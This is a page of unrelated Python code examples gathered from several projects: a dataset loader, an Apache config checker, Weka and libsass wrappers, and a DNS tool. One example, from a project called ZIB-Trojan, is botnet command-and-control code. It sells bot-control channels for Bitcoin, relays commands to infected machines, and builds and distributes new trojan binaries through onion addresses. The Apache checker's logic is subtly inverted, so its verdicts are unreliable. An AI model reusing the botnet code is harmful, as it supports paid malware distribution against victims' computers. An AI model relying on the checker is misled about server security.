("taxonrank", ("char",)),
("verbatimtaxonrank", ("char",)),
("scientificnameauthorship", ("char",)),
("vernacularname", ("char",)),
("nomenclaturalcode", ("char",)),
("taxonomicstatus", ("char",)),
("keyname", ("char",)),
("haslicense", ("int",)),
("vntype", ("char",)),
("rank", ("int",)),
("mappable", ("int",)),
("hashid", ("char",)),
("hastypestatus", ("int",)),
("wascaptive", ("int",)),
("wasinvasive", ("int",)),
("hastissue", ("int",)),
("hasmedia", ("int",)),
("isfossil", ("int",)),
("haslength", ("int",)),
("haslifestage", ("int",)),
("hasmass", ("int",)),
("hassex", ("int",)),
("lengthinmm", ("double",)),
("massing", ("double",)),
("lengthunitsinferred", ("char",)),
("massunitsinferred", ("char",)),
("underivedlifestage", ("char",)),
("underivedsex", ("char",))]
engine.table = table
engine.create_table()
if not os.path.isfile(engine.format_filename(filename)):
engine.download_files_from_archive(self.urls[tablename], [filename], filetype="zip", archivename="vertnet_latest_" + str(tablename))
engine.insert_data_from_file(engine.format_filename(str(filename)))
0
Example 70
def analyze(self, options):
""" Analyze Apache config file searching for harmful settings"""
check_results = self.check_results
apache_conf_files = self.required_files
if options.apache_conf:
for f in options.apache_conf:
apache_conf_files.append(f)
apache_conf_file_found = False
for apache_conf in apache_conf_files:
if os.path.isfile(apache_conf):
apache_conf_file_found = True
fp = None
try:
fp = open(apache_conf, 'r')
except IOError, (errno, strerror):
check_results['info'].append(
'Could not open %s: %s' % (apache_conf, strerror)
)
continue
lines = [x.strip('\n') for x in fp.readlines()]
fp.close()
# Checking if ServerTokens is using harmful conf
if not 'ServerTokens Minimal' in lines:
check_results['ok'].append(
'ServerTokens is not using harmful conf'
)
else:
check_results['medium'].append(
'ServerTokens is using harmful conf (set Minimal)'
)
# Checking if KeepAlive is set to On
if 'KeepAlive On' in lines:
check_results['ok'].append(
'KeepAlive is not using harmful conf'
)
else:
check_results['medium'].append(
'KeepAlive is using harmful conf (set On)'
)
# Checking if ServerSignature is set to On
if 'ServerSignature Off' in lines:
check_results['ok'].append(
'ServerSignature is not using harmful conf'
)
else:
check_results['medium'].append(
'ServerSignature is using harmful conf (set Off)'
)
# Checking if LimitRequestBody is bigger than 0
if 'LimitRequestBody' in lines:
for line in lines:
if line.startswith('LimitRequestBody') is True:
piece = line.split(' ')
if int(piece[1]) == 0:
check_results['ok'].append(
'LimitRequestBody is not using harmful' +
' value (0)'
)
else:
check_results['medium'].append(
'LimitRequestBody is using harmful value' +
' (0)'
)
else:
check_results['ok'].append(
'LimitRequestBody is not using harmful value (0)'
)
# Checking if LimitRequestFields is bigger than 0
if 'LimitRequestFields' in lines:
for line in lines:
if line.startswith('LimitRequestFields') is True:
piece = line.split(' ')
if int(piece[1]) == 0:
check_results['ok'].append(
'LimitRequestFields is not using harmful' +
' value (0)'
)
else:
check_results['medium'].append(
'LimitRequestFields is using harmful' +
' value (0)'
)
else:
check_results['ok'].append(
'LimitRequestFields is not using harmful value (0)'
)
# Checking if LimitRequestFieldsize is equal 8190
if 'LimitRequestFieldsize' in lines:
for line in lines:
if line.startswith('LimitRequestFieldsize') is True:
piece = line.split(' ')
if int(piece[1]) == 0:
check_results['ok'].append(
'LimitRequestFieldsize is using good' +
' value (8190)'
)
else:
check_results['low'].append(
'LimitRequestFieldsize is not using good' +
' value (8190)'
)
else:
check_results['ok'].append(
'LimitRequestFieldsize is using good value (8190)'
)
# Checking if LimitRequestLine is equal 8190
if 'LimitRequestLine' in lines:
for line in lines:
if line.startswith('LimitRequestLine') is True:
piece = line.split(' ')
if int(piece[1]) == 0:
check_results['ok'].append(
'LimitRequestLine is using good value' +
' (8190)'
)
else:
check_results['low'].append(
'LimitRequestLine is not using good' +
' value (8190)'
)
else:
check_results['ok'].append(
'LimitRequestLine is using good value (8190)'
)
# Checking Timeout less than 300
tvalue = 300
for line in lines:
if line.startswith('Timeout') is True:
piece = line.split(' ')
if int(piece[1]) <= tvalue:
check_results['ok'].append(
'Timeout is not using harmful value (>=%s)'
% (tvalue)
)
else:
check_results['medium'].append(
'Timeout is using harmful value (>=%s)'
% (tvalue)
)
# Checking if access to Apache manual is enabled
for line in lines:
if line.startswith('Alias /manual/') is True:
piece = line.split(' ')
if (piece[1]) == '/manual/':
check_results['medium'].append(
'Access to Apache manual is enabled'
)
else:
check_results['ok'].append(
'Access to Apache manual is disabled'
)
# Checking .htpasswd files permission
mode = "550"
mode = int(mode, 8)
locate_status, locate_returns = \
commands.getstatusoutput('locate .htpasswd')
if os.path.exists(locate_returns):
if locate_status == 0:
for locate_return in locate_returns.split('\n'):
if stat.S_IMODE(os.stat(locate_return).st_mode) == mode:
check_results['ok'].append(
'The file %s is not using harmful permission (550)'
% (locate_return)
)
else:
check_results['medium'].append(\
'The file %s is using harmful permission (550)'
% (locate_return)
)
else:
check_results['info'].append(
'Could not find a .htpasswd file. Please, run updatedb'
)
# If there is, closing the apache_config file
if not apache_conf_file_found:
check_results['info'].append(
'Could not find Apache\'s configuration files'
)
return check_results
0
Example 71
Project: weka Source File: classifiers.py
def predict(self, query_data, verbose=False, distribution=False, cleanup=True):
"""
Iterates over the predicted values and probability (if supported).
Each iteration yields a tuple of the form (prediction, probability).
If the file is a test file (i.e. contains no query variables),
then the tuple will be of the form (prediction, actual).
See http://weka.wikispaces.com/Making+predictions
for further explanation on interpreting Weka prediction output.
"""
model_fn = None
query_fn = None
clean_query = False
stdout = None
try:
# Validate query data.
if isinstance(query_data, basestring):
assert os.path.isfile(query_data)
query_fn = query_data
else:
assert isinstance(query_data, arff.ArffFile)
fd, query_fn = tempfile.mkstemp(suffix='.arff')
os.close(fd)
open(query_fn, 'w').write(query_data.write())
clean_query = True
assert query_fn
# Validate model file.
fd, model_fn = tempfile.mkstemp()
os.close(fd)
assert self._model_data, \
"You must train this classifier before predicting."
fout = open(model_fn, 'wb')
fout.write(self._model_data)
fout.close()
# print(open(model_fn).read()
# print(open(query_fn).read()
# Call Weka Jar.
args = dict(
CP=CP,
classifier_name=self.name,
model_fn=model_fn,
query_fn=query_fn,
#ckargs = self._get_ckargs_str(),
distribution=('-distribution' if distribution else ''),
)
cmd = (
"java -cp %(CP)s %(classifier_name)s -p 0 %(distribution)s "
"-l \"%(model_fn)s\" -T \"%(query_fn)s\"") % args
if verbose:
print(cmd)
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=True)
stdin, stdout, stderr = (p.stdin, p.stdout, p.stderr)
stdout_str = stdout.read()
stderr_str = stderr.read()
if verbose:
print('stdout:')
print(stdout_str)
print('stderr:')
print(stderr_str)
if stderr_str:
raise PredictionError(stderr_str)
if stdout_str:
# inst# actual predicted error prediction
#header = 'inst,actual,predicted,error'.split(',')
query = arff.ArffFile.load(query_fn)
query_variables = [
query.attributes[i]
for i, v in enumerate(query.data[0])
if v == arff.MISSING]
if not query_variables:
query_variables = [query.attributes[-1]]
# assert query_variables, \
# "There must be at least one query variable in the query."
if verbose:
print('query_variables:', query_variables)
header = 'predicted'.split(',')
# sample line: 1 1:? 4:36 + 1
# Expected output without distribution:
#=== Predictions on test data ===
#
# inst# actual predicted error prediction
# 1 1:? 11:Acer_tr + 1
#=== Predictions on test data ===
#
# inst# actual predicted error
# 1 ? 7 ?
#=== Predictions on test data ===
#
# inst# actual predicted error prediction
# 1 1:? 1:0 0.99
# 2 1:? 1:0 0.99
# 3 1:? 1:0 0.99
# 4 1:? 1:0 0.99
# 5 1:? 1:0 0.99
# Expected output with distribution:
#=== Predictions on test data ===
#
# inst# actual predicted error distribution
# 1 1:? 11:Acer_tr + 0,0,0,0,0,0,0,0,0,0,*1,0,0,0,0,0...
q = re.findall(
r'J48 pruned tree\s+\-+:\s+([0-9]+)\s+',
stdout_str.decode('utf-8'), re.MULTILINE|re.DOTALL)
if q:
class_label = q[0]
prob = 1.0
yield PredictionResult(
actual=None,
predicted=class_label,
probability=prob,)
elif re.findall(r'error\s+(?:distribution|prediction)', stdout_str.decode('utf-8')):
# Check for distribution output.
matches = re.findall(
r"^\s*[0-9\.]+\s+[a-zA-Z0-9\.\?\:]+\s+(?P<cls_value>[a-zA-Z0-9_\.\?\:]+)"
r"\s+\+?\s+(?P<prob>[a-zA-Z0-9\.\?\,\*]+)",
stdout_str,
re.MULTILINE)
assert matches, \
("No results found matching distribution pattern in stdout: %s") \
% stdout_str
for match in matches:
prediction, prob = match
class_index, class_label = prediction.split(':')
class_index = int(class_index)
if distribution:
# Convert list of probabilities into a hash linking the prob
# to the associated class value.
prob = dict(zip(
query.attribute_data[query.attributes[-1]],
map(float, prob.replace('*', '').split(','))))
else:
prob = float(prob)
class_label = query.attribute_data[query.attributes[-1]][class_index-1]
yield PredictionResult(
actual=None,
predicted=class_label,
probability=prob,)
else:
# Otherwise, assume a simple output.
matches = re.findall(
r"^\s*([0-9\.]+)\s+([a-zA-Z0-9\.\?\:]+)\s+([a-zA-Z0-9_\.\?\:]+)\s+",
stdout_str.decode('utf-8'),
re.MULTILINE)
assert matches, \
"No results found matching simple pattern in stdout: %s" % stdout_str
#print('matches:',len(matches)
for match in matches:
inst, actual, predicted = match
class_name = query.attributes[-1]
actual_value = query.get_attribute_value(class_name, actual)
predicted_value = query.get_attribute_value(class_name, predicted)
yield PredictionResult(
actual=actual_value,
predicted=predicted_value,
probability=None,)
finally:
# Cleanup files.
if cleanup:
if model_fn:
self._model_data = open(model_fn, 'rb').read()
os.remove(model_fn)
if query_fn and clean_query:
os.remove(query_fn)
0
Example 72
def compile(**kwargs):
"""There are three modes of parameters :func:`compile()` can take:
``string``, ``filename``, and ``dirname``.
The ``string`` parameter is the most basic way to compile SASS.
It simply takes a string of SASS code, and then returns a compiled
CSS string.
:param string: SASS source code to compile. it's exclusive to
``filename`` and ``dirname`` parameters
:type string: :class:`str`
:param output_style: an optional coding style of the compiled result.
choose one of: ``'nested'`` (default), ``'expanded'``,
``'compact'``, ``'compressed'``
:type output_style: :class:`str`
:param source_comments: whether to add comments about source lines.
:const:`False` by default
:type source_comments: :class:`bool`
:param include_paths: an optional list of paths to find ``@import``\ ed
SASS/CSS source files
:type include_paths: :class:`collections.Sequence`, :class:`str`
:param precision: optional precision for numbers. :const:`5` by default.
:type precision: :class:`int`
:param custom_functions: optional mapping of custom functions.
see also below `custom functions
<custom-functions>`_ description
:type custom_functions: :class:`collections.Set`,
:class:`collections.Sequence`,
:class:`collections.Mapping`
:param indented: optional declaration that the string is SASS, not SCSS
formatted. :const:`False` by default
:type indented: :class:`bool`
:returns: the compiled CSS string
:param importers: optional callback functions.
see also below `importer callbacks
<importer-callbacks>`_ description
:type importers: :class:`collections.Callable`
:rtype: :class:`str`
:raises sass.CompileError: when it fails for any reason
(for example the given SASS has broken syntax)
The ``filename`` is the most commonly used way. It takes a string of
SASS filename, and then returns a compiled CSS string.
:param filename: the filename of SASS source code to compile.
it's exclusive to ``string`` and ``dirname`` parameters
:type filename: :class:`str`
:param output_style: an optional coding style of the compiled result.
choose one of: ``'nested'`` (default), ``'expanded'``,
``'compact'``, ``'compressed'``
:type output_style: :class:`str`
:param source_comments: whether to add comments about source lines.
:const:`False` by default
:type source_comments: :class:`bool`
:param source_map_filename: use source maps and indicate the source map
output filename. :const:`None` means not
using source maps. :const:`None` by default.
:type source_map_filename: :class:`str`
:param include_paths: an optional list of paths to find ``@import``\ ed
SASS/CSS source files
:type include_paths: :class:`collections.Sequence`, :class:`str`
:param precision: optional precision for numbers. :const:`5` by default.
:type precision: :class:`int`
:param custom_functions: optional mapping of custom functions.
see also below `custom functions
<custom-functions>`_ description
:type custom_functions: :class:`collections.Set`,
:class:`collections.Sequence`,
:class:`collections.Mapping`
:param importers: optional callback functions.
see also below `importer callbacks
<importer-callbacks>`_ description
:type importers: :class:`collections.Callable`
:returns: the compiled CSS string, or a pair of the compiled CSS string
and the source map string if ``source_map_filename`` is set
:rtype: :class:`str`, :class:`tuple`
:raises sass.CompileError: when it fails for any reason
(for example the given SASS has broken syntax)
:raises exceptions.IOError: when the ``filename`` doesn't exist or
cannot be read
The ``dirname`` is useful for automation. It takes a pair of paths.
The first of the ``dirname`` pair refers the source directory, contains
several SASS source files to compiled. SASS source files can be nested
in directories. The second of the pair refers the output directory
that compiled CSS files would be saved. Directory tree structure of
the source directory will be maintained in the output directory as well.
If ``dirname`` parameter is used the function returns :const:`None`.
:param dirname: a pair of ``(source_dir, output_dir)``.
it's exclusive to ``string`` and ``filename``
parameters
:type dirname: :class:`tuple`
:param output_style: an optional coding style of the compiled result.
choose one of: ``'nested'`` (default), ``'expanded'``,
``'compact'``, ``'compressed'``
:type output_style: :class:`str`
:param source_comments: whether to add comments about source lines.
:const:`False` by default
:type source_comments: :class:`bool`
:param include_paths: an optional list of paths to find ``@import``\ ed
SASS/CSS source files
:type include_paths: :class:`collections.Sequence`, :class:`str`
:param precision: optional precision for numbers. :const:`5` by default.
:type precision: :class:`int`
:param custom_functions: optional mapping of custom functions.
see also below `custom functions
<custom-functions>`_ description
:type custom_functions: :class:`collections.Set`,
:class:`collections.Sequence`,
:class:`collections.Mapping`
:raises sass.CompileError: when it fails for any reason
(for example the given SASS has broken syntax)
.. _custom-functions:
The ``custom_functions`` parameter can take three types of forms:
:class:`~collections.Set`/:class:`~collections.Sequence` of \
:class:`SassFunction`\ s
It is the most general form. Although pretty verbose, it can take
any kind of callables like type objects, unnamed functions,
and user-defined callables.
.. code-block:: python
sass.compile(
...,
custom_functions={
sass.SassFunction('func-name', ('$a', '$b'), some_callable),
...
}
)
:class:`~collections.Mapping` of names to functions
Less general, but easier-to-use form. Although it's not it can take
any kind of callables, it can take any kind of *functions* defined
using :keyword:`def`/:keyword:`lambda` syntax.
It cannot take callables other than them since inspecting arguments
is not always available for every kind of callables.
.. code-block:: python
sass.compile(
...,
custom_functions={
'func-name': lambda a, b: ...,
...
}
)
:class:`~collections.Set`/:class:`~collections.Sequence` of \
named functions
Not general, but the easiest-to-use form for *named* functions.
It can take only named functions, defined using :keyword:`def`.
It cannot take lambdas sinc names are unavailable for them.
.. code-block:: python
def func_name(a, b):
return ...
sass.compile(
...,
custom_functions={func_name}
)
.. _importer-callbacks:
Newer versions of ``libsass`` allow developers to define callbacks to be
called and given a chance to process ``@import`` directives. You can
define yours by passing in a list of callables via the ``importers``
parameter. The callables must be passed as 2-tuples in the form:
.. code-block:: python
(priority_int, callback_fn)
A priority of zero is acceptable; priority determines the order callbacks
are attempted.
These callbacks must accept a single string argument representing the path
passed to the ``@import`` directive, and either return ``None`` to
indicate the path wasn't handled by that callback (to continue with others
or fall back on internal ``libsass`` filesystem behaviour) or a list of
one or more tuples, each in one of three forms:
* A 1-tuple representing an alternate path to handle internally; or,
* A 2-tuple representing an alternate path and the content that path
represents; or,
* A 3-tuple representing the same as the 2-tuple with the addition of a
"sourcemap".
All tuple return values must be strings. As a not overly realistic
example:
.. code-block:: python
def my_importer(path):
return [(path, '#' + path + ' { color: red; }')]
sass.compile(
...,
importers=[(0, my_importer)]
)
Now, within the style source, attempting to ``@import 'button';`` will
instead attach ``color: red`` as a property of an element with the
imported name.
.. versionadded:: 0.4.0
Added ``source_comments`` and ``source_map_filename`` parameters.
.. versionchanged:: 0.6.0
The ``source_comments`` parameter becomes to take only :class:`bool`
instead of :class:`str`.
.. deprecated:: 0.6.0
Values like ``'none'``, ``'line_numbers'``, and ``'map'`` for
the ``source_comments`` parameter are deprecated.
.. versionadded:: 0.7.0
Added ``precision`` parameter.
.. versionadded:: 0.7.0
Added ``custom_functions`` parameter.
.. versionadded:: 0.11.0
``source_map_filename`` no longer implies ``source_comments``.
"""
modes = set()
for mode_name in MODES:
if mode_name in kwargs:
modes.add(mode_name)
if not modes:
raise TypeError('choose one at least in ' + and_join(MODES))
elif len(modes) > 1:
raise TypeError(and_join(modes) + ' are exclusive each other; '
'cannot be used at a time')
precision = kwargs.pop('precision', 5)
output_style = kwargs.pop('output_style', 'nested')
if not isinstance(output_style, string_types):
raise TypeError('output_style must be a string, not ' +
repr(output_style))
try:
output_style = OUTPUT_STYLES[output_style]
except KeyError:
raise CompileError('{0} is unsupported output_style; choose one of {1}'
''.format(output_style, and_join(OUTPUT_STYLES)))
source_comments = kwargs.pop('source_comments', False)
if source_comments in SOURCE_COMMENTS:
if source_comments == 'none':
deprecation_message = ('you can simply pass False to '
"source_comments instead of 'none'")
source_comments = False
elif source_comments in ('line_numbers', 'default'):
deprecation_message = ('you can simply pass True to '
"source_comments instead of " +
repr(source_comments))
source_comments = True
else:
deprecation_message = ("you don't have to pass 'map' to "
'source_comments but just need to '
'specify source_map_filename')
source_comments = False
warnings.warn(
"values like 'none', 'line_numbers', and 'map' for "
'the source_comments parameter are deprecated; ' +
deprecation_message,
DeprecationWarning
)
if not isinstance(source_comments, bool):
raise TypeError('source_comments must be bool, not ' +
repr(source_comments))
fs_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
source_map_filename = kwargs.pop('source_map_filename', None)
if not (source_map_filename is None or
isinstance(source_map_filename, string_types)):
raise TypeError('source_map_filename must be a string, not ' +
repr(source_map_filename))
elif isinstance(source_map_filename, text_type):
source_map_filename = source_map_filename.encode(fs_encoding)
if not ('filename' in modes or source_map_filename is None):
raise CompileError('source_map_filename is only available with '
'filename= keyword argument since it has to be '
'aware of it')
try:
include_paths = kwargs.pop('include_paths') or b''
except KeyError:
include_paths = b''
else:
if isinstance(include_paths, collections.Sequence):
include_paths = os.pathsep.join(include_paths)
elif not isinstance(include_paths, string_types):
raise TypeError('include_paths must be a sequence of strings, or '
'a colon-separated (or semicolon-separated if '
'Windows) string, not ' + repr(include_paths))
if isinstance(include_paths, text_type):
include_paths = include_paths.encode(fs_encoding)
custom_functions = kwargs.pop('custom_functions', ())
if isinstance(custom_functions, collections.Mapping):
custom_functions = [
SassFunction.from_lambda(name, lambda_)
for name, lambda_ in custom_functions.items()
]
elif isinstance(custom_functions, (collections.Set, collections.Sequence)):
custom_functions = [
func if isinstance(func, SassFunction)
else SassFunction.from_named_function(func)
for func in custom_functions
]
else:
raise TypeError(
'custom_functions must be one of:\n'
'- a set/sequence of {0.__module__}.{0.__name__} objects,\n'
'- a mapping of function name strings to lambda functions,\n'
'- a set/sequence of named functions,\n'
'not {1!r}'.format(SassFunction, custom_functions)
)
importers = _validate_importers(kwargs.pop('importers', None))
if 'string' in modes:
string = kwargs.pop('string')
if isinstance(string, text_type):
string = string.encode('utf-8')
indented = kwargs.pop('indented', False)
if not isinstance(indented, bool):
raise TypeError('indented must be bool, not ' +
repr(source_comments))
_check_no_remaining_kwargs(compile, kwargs)
s, v = _sass.compile_string(
string, output_style, source_comments, include_paths, precision,
custom_functions, indented, importers,
)
if s:
return v.decode('utf-8')
elif 'filename' in modes:
filename = kwargs.pop('filename')
if not isinstance(filename, string_types):
raise TypeError('filename must be a string, not ' + repr(filename))
elif not os.path.isfile(filename):
raise IOError('{0!r} seems not a file'.format(filename))
elif isinstance(filename, text_type):
filename = filename.encode(fs_encoding)
_check_no_remaining_kwargs(compile, kwargs)
s, v, source_map = _sass.compile_filename(
filename, output_style, source_comments, include_paths, precision,
source_map_filename, custom_functions, importers,
)
if s:
v = v.decode('utf-8')
if source_map_filename:
source_map = source_map.decode('utf-8')
v = v, source_map
return v
elif 'dirname' in modes:
try:
search_path, output_path = kwargs.pop('dirname')
except ValueError:
raise ValueError('dirname must be a pair of (source_dir, '
'output_dir)')
_check_no_remaining_kwargs(compile, kwargs)
s, v = compile_dirname(
search_path, output_path, output_style, source_comments,
include_paths, precision, custom_functions, importers,
)
if s:
return
else:
raise TypeError('something went wrong')
assert not s
raise CompileError(v)
0
Example 73
Project: ZIB-Trojan Source File: intel.py
def handleCommands(r, s, output):
globals channels
globals conn
a = r.split(" ")[3].split(":")[1]
if a.startswith("!help"):
print "Handling HELP command for user: "+output+"..."
sendmsg(output, s, "http://f4eqxs3tyrkba7f2.onion/irchelp/help.txt")
elif a.startswith("!commands"):
print "Handling COMMANDS command."
sendmsg(output, s, "http://f4eqxs3tyrkba7f2.onion/irchelp/commands.txt")
sendmsg(output, s, "For the zombie commands, go to http://f4eqxs3tyrkba7f2.onion/commands.txt")
elif a.startswith("!cmd"):
print 'user is running a channel-wide command through Zlo.'
authPassword=""
try:
authPassword = r.split(" ")[4]
except:
pass
command = ""
if not authPassword == "":
for channel in channels:
if not channel == "":
if intelhashing.compare(authPassword, channel.split("|")[2]):
worked=True
print 'user authed for channel-wide command.'
x=0
while 1:
x=x+1
worked=False
if x > 4:
if not command == "":
try:
command = command + " " + r.split(" ")[x]
worked=True
except:
pass
else:
try:
command = command + r.split(" ")[x]
worked=True
except:
pass
if worked == False:
break
command=command.rstrip('\n').rstrip('\r')
if not command == "":
sendmsg(channel.split("|")[0], s, command)
print "command ran."
sendmsg(output, s, "command: " + command + " ran successfully.")
else:
print 'command empty.'
sendmsg(output, s, "You must specify the command you'd like to run.")
command = "x"
else:
sendmsg(output, s, "Remember to enter your password.")
worked=True
command = "x"
print "user: "+output+" forgot to enter his password."
if command == "":
sendmsg(output, s, "Password invalid.")
print "user: "+output+" entered an invalid password for running a bot command."
elif a.startswith("!logout"):
print "user is logging out..."
authPassword=""
try:
authPassword=r.split(" ")[4]
except:
pass
if not authPassword == "":
for channel in channels:
if not channel == "":
print 'trying password: '+authPassword+' against: '+channel.split("|")[2]
if intelhashing.compare(authPassword, channel.split("|")[2]):
print "logging user out..."
sendmsg(channel.split("|")[0], s, "!logout")
print 'user was logged out.'
sendmsg(output, s, "You were logged out.")
else:
sendmsg(output, s, "Remember to input your auth password.")
print "user didn't enter a password to logout: "+output
elif a.startswith("!buy"):
print '!! user is purchasing !!'
sendmsg(output, s, "Creating login...")
print 'creating user login.'
print 'setting channel...'
newchannel = "#"
while 1:
for x in range(0,7):
newchannel = newchannel + random.choice(string.letters+string.digits)
if not newchannel in urllib.urlopen("channels.txt").read():
break
else:
newchannel = "#"
print 'channel set.'
print 'setting channel password...'
channelpassword=generate_password()
print 'password set.'
authpassword=""
print 'creating auth password...'
while 1:
authpassword=generate_password()
goodpassword=True
for channel in channels:
if not channel == "" and "|" in channel:
try:
if channel.split("|")[2] == authpassword:
goodpassword=False
except:
pass
for channel in urllib.urlopen("btcpurchases.txt").read().split():
if not channel == "" and "|" in channel:
try:
if intelhashing.compare(authPassword, channel.split("|")[4]):
goodpassword=False
except:
pass
if goodpassword == True:
break
print 'password set.'
print 'creating the rest of the passwords...'
botmainprocess = generate_password()+".exe"
botdaemonprocess = generate_password()+".exe"
installdir = generate_password()
regkeyname = generate_password()
print 'passwords set.'
currentTime=datetime.datetime.now().strftime("%Y-%m-%d_%H:%M")
bitcoinAddress = conn.getnewaddress()
f = open("btcpurchases.txt", "a")
f.write("\n"+currentTime+"|"+bitcoinAddress+"|"+newchannel+"|"+channelpassword+"|"+intelhashing.encrypt(authpassword)+"|"+botmainprocess+"|"+botdaemonprocess+"|"+installdir+"|"+regkeyname)
f.close()
sendmsg(output, s, "Your account details are [channel: "+newchannel+" channel password "+channelpassword+" auth password: "+authpassword+"]")
sendmsg(output, s, "In order to activate your account, you must send "+channelCost+" BTC or more to the follwing address: "+bitcoinAddress+" - cleaned coins and multi-payment transactions are okay, just make sure to pay in full within 24 hours. Your account will not be activated until the Bitcoin transaction has 3 confirmations. It may take a short time for our system to recognize this, as well. To join a password-protected IRC channel, type /join #channel password")
# channels = urllib.urlopen("channels.txt").read().split()
# s.send("JOIN "+newchannel+"\r\n")
# s.send("MODE "+newchannel+" +k "+channelpassword+"\r\n")
# print 'user created.'
# for x in range(0,3):
# sendmsg(output, s, "User created. WRITE DOWN THE FOLLOWING!: auth password: "+authpassword+" channel password: "+channelpassword+" channel: "+newchannel)
elif a.startswith("!newbin"):
print "creating new binary..." #give user file md5 sum
sendmsg(output, s, "Creating new binary...")
authPassword=""
try:
authPassword=r.split(" ")[4]
except:
pass
botmainprocess=""
botdaemonprocess=""
newchannel=""
channelpassword=""
regkeyname=""
installdir=""
laworked=False
if not authPassword == "":
for channel in channels:
if not channel == "" and "|" in channel:
print "trying "+authPassword+" against "+channel.split("|")[2]
if intelhashing.compare(authPassword, channel.split("|")[2]):
if not NumberProcsOpen("pyinstaller.exe") > 5 and not NumberProcsOpen("python.exe") > 7:
newchannel=channel.split("|")[0]
channelpassword=channel.split("|")[1]
botmainprocess=channel.split("|")[3]
botdaemonprocess=channel.split("|")[4]
installdir=channel.split("|")[5]
regkeyname=channel.split("|")[6]
outputfile=""
while 1:
outputfile=""
for x in range(0,random.randrange(5,12)):
outputfile = outputfile + random.choice(string.letters+string.digits)
print "output file will be: "+outputfile+".exe..."
outputfile = outputfile + ".exe"
if not os.path.isfile("\\Python27\\Scripts\\dist\\"+outputfile):
print "running build command..."
os.chdir("\\python27\\scripts")
print "command: chp.exe \\python27\\python.exe compileZIB.py "+botmainprocess+" "+botdaemonprocess+" "+newchannel+" "+channelpassword+" "+regkeyname+" "+installdir+" "+outputfile
os.system("chp.exe \\python27\\python.exe compileZIB.py "+botmainprocess+" "+botdaemonprocess+" "+newchannel+" "+channelpassword+" "+regkeyname+" "+installdir+" "+outputfile)
print "build command ran."
sendmsg(output,s,"Your file should be avaliable at: http://zpsbcbp3hz7syjmt.onion:80/"+outputfile+" within a minute, or two. After 3 minutes, it will be deleted.")
sendmsg(output, s, "NOTICE: Make sure to test new binaries before spreading them, or updating them on your bots. Always use MD5 verification before using bots' update function. If you get a dead binary, re-build. If that doesn't work, get in contact with us ASAP.")
laworked=True
print 'binary: '+outputfile+' created for user: '+output
break
else:
print "Error: Maximum number of binary builds running (5). user tried to create a new one: "+output
sendmsg(output, s, "The maximum number of concurrent binary builds has reached its peak. Please try again later. If you're found abusing this function, your license will be permanently terminated without notice. Please try again in ten minutes.")
if laworked == True:
break
else:
print 'user entered no password.'
sendmsg(output, s, "No password specified. Unable to build binary.")
laworked=True
if laworked == False:
sendmsg(output, s, "Invalid main authentication password entered. Unable to build binary.")
print "user: "+output+" entered the wrong password."
elif a.startswith("!recoverpassword"):
authPassword = ""
try:
authPassword=r.split(" ")[4]
print "authentication password recovery input: "+authPassword+" by user: "+output
except:
pass
authSuccess=False
if not authPassword == "":
for channel in channels:
if not channel == "" and "|" in channel:
if intelhashing.compare(authPassword, channel.split("|")[2]):
authSuccess=True
print "Password recovery authentication successful! Password: " + authPassword + " recovered password: "+channel.split("|")[1]+" channel: "+channel.split("|")[0]
sendmsg(output, s, "Password recovery successful! Recovered channel password: "+channel.split("|")[1]+" channel: "+channel.split("|")[0])
else:
sendmsg(output, s, "You failed to input your main authentication password.")
print "Authentication password recovery auth failed due to no password."
authSuccess=True
if authSuccess == False:
sendmsg(output, s, "Channel password recovery failed! Invalid password.")
print "Password recovery auth failed. password: " + authPassword
elif a.startswith("!auth"):
authPassword = ""
print "Handling AUTH command."
worked=False
try:
authPassword = r.split(" ")[4]
print "Authentication password: "+authPassword
worked = True
except:
pass
authworked=False
if worked == True:
for channel in channels:
if not channel == "" and "|" in channel:
print "testing password: "+channel.split("|")[2]+" against: "+authPassword+"."
if intelhashing.compare(authPassword, channel.split("|")[2]):
sendmsg(channel.split("|")[0], s, "!login "+output)
authworked=True
sendmsg(output, s, "You have been successfully authenticated. Join the channel "+channel.split("|")[0]+", in order to control your bots. Make sure to run the !logout command in your channel as an authenticated user to logout all pre-existing log-ins, so nobody can change their nick-name to yours and control your bots. This is unlikely to happen, unless a user has stolen your channel password. To join a passworded IRC channel, type /join #channel password")
print "Authentication successful!"
if authworked == False:
sendmsg(output, s, "Authentication failed. Commands are case-sensitive.")
print "Authentication failed."
0
Example 74
Project: dnsviz Source File: probe.py
def name_addr_mappings_from_string(domain, addr_mappings, delegation_mapping, require_name):
global next_port
addr_mappings = addr_mappings.split(',')
i = 1
for mapping in addr_mappings:
# get rid of whitespace
mapping = mapping.strip()
# Determine whether there is a port stuck on there
match = PORT_RE.search(mapping)
if match is not None:
mapping = match.group(1)
port = int(match.group(2))
port_str = ':%d' % port
else:
port = 53
port_str = ''
num_replacements = None
# if the value is actually a path, then check it as a zone file
if os.path.isfile(mapping):
# if this is a file containing delegation records, then read the
# file, create a name=value string, and call name_addr_mappings_from_string()
if require_name:
mappings_from_file = []
try:
s = io.open(mapping, 'r', encoding='utf-8').read()
except IOError as e:
usage('%s: "%s"' % (e.strerror, mapping))
sys.exit(3)
try:
m = dns.message.from_text(str(';ANSWER\n'+s))
except dns.exception.DNSException as e:
usage('Error reading delegation records from %s: "%s"' % (mapping, e))
sys.exit(3)
try:
ns_rrset = m.find_rrset(m.answer, domain, dns.rdataclass.IN, dns.rdatatype.NS)
except KeyError:
usage('No NS records for %s found in %s' % (lb2s(domain.canonicalize().to_text()), mapping))
sys.exit(3)
for rdata in ns_rrset:
a_rrsets = [r for r in m.answer if r.name == rdata.target and r.rdtype in (dns.rdatatype.A, dns.rdatatype.AAAA)]
if not a_rrsets or not rdata.target.is_subdomain(domain.parent()):
mappings_from_file.append(lb2s(rdata.target.canonicalize().to_text()))
else:
for a_rrset in a_rrsets:
for a_rdata in a_rrset:
mappings_from_file.append('%s=%s' % (lb2s(rdata.target.canonicalize().to_text()), IPAddr(a_rdata.address)))
name_addr_mappings_from_string(domain, ','.join(mappings_from_file), delegation_mapping, require_name)
continue
# otherwise (it is the zone proper), just serve the file
else:
if port_str == '':
#TODO assign random port here
port = next_port
next_port += 1
_serve_zone(domain, mapping, port)
name = 'localhost'
addr = '127.0.0.1'
else:
# First determine whether the argument is name=value or simply value
try:
name, addr = NAME_VAL_DELIM_RE.split(mapping, 1)
except ValueError:
# Argument is a single value. Now determine whether that value is
# a name or an address.
try:
IPAddr(BRACKETS_RE.sub(r'\1', mapping))
except ValueError:
# see if this was an IPv6 address without a port
try:
